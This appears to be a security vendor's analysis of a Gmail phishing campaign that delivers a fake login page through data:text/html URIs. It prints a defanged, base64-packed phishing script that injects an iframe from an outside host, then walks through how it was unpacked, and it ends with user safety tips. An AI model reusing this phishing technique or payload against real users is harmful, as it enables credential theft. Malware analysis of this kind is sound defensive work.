Recently, there has been a wave of Phishing Scam targeting Google users. The Spam delivers either a pdf file or a word document which contains a link and in some cases just the plain simple email containing the link. It is also to be noted that some of the best researchers have been fooled by the method.
The link is actually an html body embedded in an URI ie. data:text/html also known as Data URI Schema and is supported by all modern day browsers. One can even convert their browser into an instant notepad and all you need to do is to Copy Paste the code into the Browser URL Bar and hit Enter. data:text/html, <html contenteditable>
or Display a RED Dot data:text/html,<img src=”data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAA AAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNB AAO9TXL0Y4OHwAAAABJRU5ErkJggg==” alt=”Red dot” /> This isn’t a new method, however, what is new is that spammers are now actively targeting GMail users.
The code presented over here has been sanitized, as we closely observe the Data URI , it contains a script which has been encoded using Base-64 . Sanitized Code: data:text/html,https://accounts.google.com/ServiceLogin?service=ma il&passive=true&rm=false&continue <script src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl 7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUocGFyc2VJbnQoYy9h KSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6 Yy50b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl 7d2hpbGUoYy0tKXtkW2UoYyldPWtbY118fGUoYyl9az1bZnVuY3Rpb24 oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysn fTtjPTF9O3doaWxlKGMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJ lZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybiBwfSgnM y4yLmo9ImkgaCBrIGwgbiI7bXsoZygpe2YgMT0zLjIuOShcJzFcJyk7MS44 PVwnNy94LTRcJzsxLmE9XCdiIDRcJzsxLmM9XCdcJzsyLnAoXCdCXCcpW zBdLkMoMSl9KCkpfUUoZSl7fTMuMi56Lnk9Ijw2IHM9XFwicjovL3EudC 91L3cudlxcIiBvPVxcIkQ6IDA7QTogNSU7ZDo1JVxcIj48LzY+IjsnLDQxLDQ xLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNvbnwxMDB8aWZyYW 1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHxyZWx8c2hvcnRjdXR8aHJlZ nxoZWlnaHR8fHZhcnxmdW5jdGlvbnxoYXZlfFlvdXx0aXRsZXxiZWVufFN pZ25lZHx0cnl8b3V0fHN0eWxlfGdldEVsZW1lbnRzQnlUYWdOYW1lfF9y b3NldHRhdHJhbnNsYXRpb258aHR0cHxzcmN8dG9wfG91cmNsaWVud HN8aHRtbHxvcmVpd258fG91dGVySFRNTHxib2R5fHdpZHRofGhlYWR8 YXBwZW5kQ2hpbGR8Ym9yZGVyfGNhdGNoJy5zcGxpdCgnfCcpLDAse3 0pKQ==></script>
After we decode the string , we come across a Packer Function , these functions are generally used to obfuscate the underlying code , however, from reversing point of view, it is important to know that, for any packer , in most of the cases, it is imperative that it should use “eval” , an inbuilt javascript function to evaluate / execute JavaScript code / expressions. Over here the eval function is clearly visible, however there are numerous other packers which would – we replace eval with alert which when executed would give us the unpacked code in an alert.
eval(function(p,a,c,k,e,d),e=function(c),return(c<a?”:e(parseInt(c/a)))+ ((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))-;if(!”.replace( /^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d*e+-+;e=function(),return’\\w+’-;c=1-;while(c–){if(k[c]){p=p.replace(ne w RegExp(‘\\b’+e(c)+’\\b’,’g’),k*c+)--return p-(‘3.2.j=”i h k l n”;m,(g(),f 1=3.2.9(\’1\’);1.8=\’7/x-4\’;1.a=\’b 4\’;1.c=\’\’;2.p(\’B\’)*0+.C(1)-())-E(e),-3.2.z.y=”<6 s=\\”r://q.t/u/w.v\\” o=\\”D: 0;A: 5%;d:5%\\”></6>”;’,41,41,’|link|document|window|icon|100|iframe |image|type|createElement|rel|shortcut|href|height||var|function| have|You|title|been|Signed|try|out|style|getElementsByTagName| _rosettatranslation|http|src|top|ourclients|html|oreiwn||outerHTM L|body|width|head|appendChild|border|catch’.split(‘|’),0,,-)) We repack the code using Base64 data:text/html,https://accounts.google.com/ServiceLogin?service=ma il&passive=true&rm=false&continue <script src=data:text/html;base64,YWxlcnQoZnVuY3Rpb24ocCxhLGMsayxlLG Qpe2U9ZnVuY3Rpb24oYyl7cmV0dXJuKGM8YT8nJzplKHBhcnNlSW50K GMvYSkpKSsoKGM9YyVhKT4zNT9TdHJpbmcuZnJvbUNoYXJDb2RlKGM rMjkpOmMudG9TdHJpbmcoMzYpKX07aWYoIScnLnJlcGxhY2UoL14vLF N0cmluZykpe3doaWxlKGMtLSl7ZFtlKGMpXT1rW2NdfHxlKGMpfWs9W 2Z1bmN0aW9uKGUpe3JldHVybiBkW2VdfV07ZT1mdW5jdGlvbigpe3Jld HVybidcXHcrJ307Yz0xfTt3aGlsZShjLS0pe2lmKGtbY10pe3A9cC5yZXBsY WNlKG5ldyBSZWdFeHAoJ1xcYicrZShjKSsnXFxiJywnZycpLGtbY10pfX1yZ XR1cm4gcH0oJzMuMi5qPSJpIGggayBsIG4iO217KGcoKXtmIDE9My4yLj koXCcxXCcpOzEuOD1cJzcveC00XCc7MS5hPVwnYiA0XCc7MS5jPVwnXC c7Mi5wKFwnQlwnKVswXS5DKDEpfSgpKX1FKGUpe30zLjIuei55PSI8NiB zPVxcInI6Ly9xLnQvdS93LnZcXCIgbz1cXCJEOiAwO0E6IDUlO2Q6NSVcXC I+PC82PiI7Jyw0MSw0MSwnfGxpbmt8ZG9jdW1lbnR8d2luZG93fGljb25 8MTAwfGlmcmFtZXxpbWFnZXx0eXBlfGNyZWF0ZUVsZW1lbnR8cmVsf HNob3J0Y3V0fGhyZWZ8aGVpZ2h0fHx2YXJ8ZnVuY3Rpb258aGF2ZXxZb 3V8dGl0bGV8YmVlbnxTaWduZWR8dHJ5fG91dHxzdHlsZXxnZXRFbGVt ZW50c0J5VGFnTmFtZXxfcm9zZXR0YXRyYW5zbGF0aW9ufGh0dHB8c3J jfHRvcHxvdXJjbGllbnRzfGh0bWx8b3JlaXdufHxvdXRlckhUTUx8Ym9keXx 3aWR0aHxoZWFkfGFwcGVuZENoaWxkfGJvcmRlcnxjYXRjaCcuc3BsaXQ oJ3wnKSwwLHt9KSk=></script> When we copy-paste the Data-URI inot the browser URL bar we are able to view the pre-packed code. From this code it is quite evident that an iframe has been used to
display the phishing page, which is retrieved from http://_rosettatranslation.top however, this wont happen in this case since 1.
The domain _rosettatranslation.top cannot exist, as it begins with an underscore.
2.
We have used alert instead of eval
Unpacking Packed JavaScript
Packers have been used extensively by Drive-by Downloads, DGA (Domain Generation Algorithm), Exploit Kits etc. in order to serve malicious pages. Sometimes it is easy to extract the code in an harmless manner and sometimes it takes a lot of ingenuity to extract / reverse. According to Google it is the prerogative of the end user to ensure the sanity / validity of the contents of the URL Bar , however google users always have the option of implementing Two Factor Authentication , as rightly suggested by Google. However, when the targeted site doesnâ&#x20AC;&#x2122;t use TFA, or is a Corporate Login Page , a spear phishing campaign has been initiated, the user has to be real attentive.
In past many years, there have been various methods to deliver the spam and entice the user to visit the malicious pages, although what hasn’t changed is the phishing page, due to which, whenever such attempts are made against a computer system protected by eScan’s eScan Smart Web-Filter, they get Detected and Blocked. Since, the present campaign is targeting Gmail users , here are some tips to keep you safe: Stay Alert, be aware of the contents of the Browser’s URL Bar, ensure that the URL always begins with HTTP/HTTPS and if it begins with data then be extra careful. 2. Browser shows distinct color coded warnings while visiting HTTP/HTTPS sites 3. Use / Implement Two Factor Authentication whenever and wherever possible. 1.